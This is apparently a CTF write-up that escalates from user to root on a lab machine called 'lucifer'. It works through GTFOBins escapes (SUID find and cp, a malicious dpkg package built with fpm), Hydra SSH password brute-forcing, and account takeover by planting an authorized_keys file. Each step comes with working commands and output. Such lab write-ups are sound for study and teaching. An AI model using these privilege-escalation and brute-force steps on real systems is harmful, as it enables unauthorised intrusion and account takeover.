victor@lucifer:~/bin$ ls -la
total 320
drwxr-xr-x 2 victor victor 4096 Mar 19 15:32 .
drwxr-x--- 4 victor victor 4096 Mar 25 06:08 ..
-rwsrwsrwt 1 john john 315904 Mar 19 06:50 find
victor@lucifer:~/bin$
so we are in victor home folder and inside it we have a folder named bin with a weirdo file privileges …
-rwsrwsrwt 1 john john 315904 Mar 19 06:50 find
we are in victor folder and the file have john suid !
by going to GTFOBins we’ll get more about these kind of exploitations …
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
let’s search for find and cause we have a normal user privileges we can only use SUID exploitation not the SUDO one
./find . -exec /bin/bash -p \; -quit
I changed sh to bash cause I like bash more :p, let’s run it
and we are john now
victor@lucifer:~/bin$ ./find . -exec /bin/bash -p \; -quit
bash-5.0$ id
uid=1004(victor) gid=1004(victor) euid=1000(john) egid=1000(john) groups=1000(john),1004(victor)
let’s go to the john home folder
we have a weird hidden file
bash-5.0$ cd /home/john
bash-5.0$ ls -la
total 32
drwxr-x--- 3 john john 4096 Mar 25 04:24 .
drwxr-xr-x 7 root root 4096 Mar 23 16:29 ..
-rw-r--r-- 1 john john 220 Mar 18 19:31 .bash_logout
-rw-r--r-- 1 john john 3526 Mar 18 19:31 .bashrc
drwx------ 3 john john 4096 Mar 18 19:32 .gnupg
-rw-r--r-- 1 john john 12 Mar 19 08:38 .private
-rw-r--r-- 1 john john 675 Mar 18 19:31 .profile
-rw------- 1 john john 106 Mar 19 04:14 .Xauthority
bash-5.0$ cat .private
dropbox2010
it looks like we have another password
let’s do another run with hydra with the new password
> hydra -L userlist.txt -P passlist.txt ssh://192.168.1.148 -s 22 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-30 14:23:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:7/p:0), ~4 tries per task
[DATA] attacking ssh://192.168.1.148:22/
[22][ssh] host: 192.168.1.148 login: lisa password: dropbox2010
[22][ssh] host: 192.168.1.148 login: victor password: irminsul
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-30 14:23:48
so we have another user access
[22][ssh] host: 192.168.1.148 login: lisa password: dropbox2010
we are in
lisa@lucifer:~$ id
uid=1001(lisa) gid=1001(lisa) groups=1001(lisa)
lisa@lucifer:~$ pwd
/home/lisa
lisa@lucifer:~$ ls -la
total 32
drwxr-x--- 5 lisa lisa 4096 Mar 30 08:23 .
drwxr-xr-x 7 root root 4096 Mar 23 16:29 ..
-rw-r--r-- 1 lisa lisa 220 Mar 18 19:34 .bash_logout
-rw-r--r-- 1 lisa lisa 3560 Mar 19 15:01 .bashrc
drwxr-xr-x 2 lisa lisa 4096 Mar 23 19:23 bin
drwx------ 3 lisa lisa 4096 Mar 30 08:23 .gnupg
drwxr-xr-x 3 lisa lisa 4096 Mar 19 15:01 .local
-rw-r--r-- 1 lisa lisa 675 Mar 18 19:34 .profile
lisa@lucifer:~$
looks like we have another bin folder !
lisa@lucifer:~$ cd bin
lisa@lucifer:~/bin$ ls -la
total 152
drwxr-xr-x 2 lisa lisa 4096 Mar 23 19:23 .
drwxr-x--- 5 lisa lisa 4096 Mar 30 08:23 ..
-rwsrws--T 1 henri lisa 146880 Mar 19 14:44 copy
lisa@lucifer:~/bin$
and also another file with henri privileges and lisa too this time !
by going back to GTFOBins and looking for any exploitation of this binary file
in linux we have cp and not copy so it the same file
./copy -R /home/henri/ /home/lisa/bin/copied/
-R for recrusive
for kind of folders and files stuff I like to use WINSCP
it’s a good interface that let you browse the files and folders
I created a new folder named copied iside of our bin folder (lisa’s bin folder) and give it 777 permissions so everyone can write there !
let’s run and see what we got ! …
and yes we were able to copy all the henri home folder inside our “copied” folder
we have a text file “flag.txt” containing this :
You’re doning well. .
keep going…
it’s says that we have to keep going …
nothing here what took my attention is the folder .ssh that we didn’t see in other user’s home
so let’s create an authorise key and try to copy it from lisa folder this time to henri .ssh folder
am going to use puttygen for windows
all what you have to do is clicking on generate and save the private key and also copy the authorized key
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAoC/2V3NrKHIWnWh+VLQiXeUcRWnmAbmxEy0dOJrf/OLp6XbNWYvmsA/HujVxWz6OPNIAfAo3vntx4mzd4crpbMqF2c2ZZgDOdEwEMIBPkMf2yd58Ss7CewaP6jHLB/JbqSWjD0PhHv5WcwtsfBw7C1/C9qLB0CQcDitEyXy2YMATwmrQpKha9cu+gbc36laWIivKW3FCUwloNGtnajAJZi0i6lk0D36PM4qJo+JR0jBaSAlhgIOhsBoRpLVlNgW2SHGOnkSWmHKUjH3mKoFIuttbTCbBtg1EJzcmLK973fEAgXIXshZAwELgtPFebiu1pU6921G/ELFdCt2bn+aSTQ== rsa-key-20200330
I created a new file in lisa bin folder name “authorized_keys” so now let’s copy it for henri’s .ssh folder !
copy /home/lisa/bin/authorized_keys /home/henri/.ssh/authorized_keys
and try to login from ssh
and we are in
login as: henri
Authenticating with public key "rsa-key-20200330"
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
henri@lucifer:~$ id
uid=1002(henri) gid=1002(henri) groups=1002(henri)
henri@lucifer:~$
as we see our authorized key was copied and cause of that we are in
I’ll make a little pause to get some coffee and I’ll get back …
am back !
so let’s run linenum.sh it a tool for linux enumeration
or let’s run linpeas.sh I like it more
what I like in this tool it colorize the results so the most dangerous things they are looking in yellow and red
You can write SUID file: /usr/local/bin/cmd
let’s run this file and see what will happen !
we can only type cmd cause we have it inside OUR PATH
or we can use the full path
henri@lucifer:~/dust$ /usr/local/bin/cmd
trevor@lucifer:~/dust$
looks like we are with trevor now !
nothing in his home folder let’s use again that enumerating tool !
we have a kind of sudo binary file we can use without password
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
Matching Defaults entries for trevor on lucifer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User trevor may run the following commands on lucifer:
(root) NOPASSWD: /usr/bin/dpkg
From GTFOBins
TF=$(mktemp -d)echo 'exec /bin/sh' > $TF/x.shfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TFsudo dpkg -i x_1.0_all.deb
so to exploit that we need to install FPM
Effing package management! Build packages for multiple platforms (deb, rpm, etc) with great ease and sanity.
we can install that in windows if you have ruby but you’ll face huge problems
So we are going to use kali linux I already have a VM running …
if you don’t have ruby
you can install it in debian
apt-get install ruby ruby-dev rubygems build-essential
and after that you have to install FPM with gem
gem install --no-document fpm
I already have it in my kali so let’s go directly to the exploitation …
I have already the package file “x_1.0_all.deb”
Don’t know what goes wrong with my kali but let’s upload the package file and run it
Oooh god what I did
So we get the root privileges and that how I solved this box
trevor@lucifer:/tmp$ sudo dpkg -i x_1.0_all.deb
Selecting previously unselected package x.
(Reading database ... 40777 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
flag.txt
# cat flag
cat: flag: No such file or directory
# cat flag.txt
WELl DONE
echo "THISISTHEFLAGTHISISTHEFLAG\!\!\!\@\@\@###" | base64 > `thisistheflag.txt`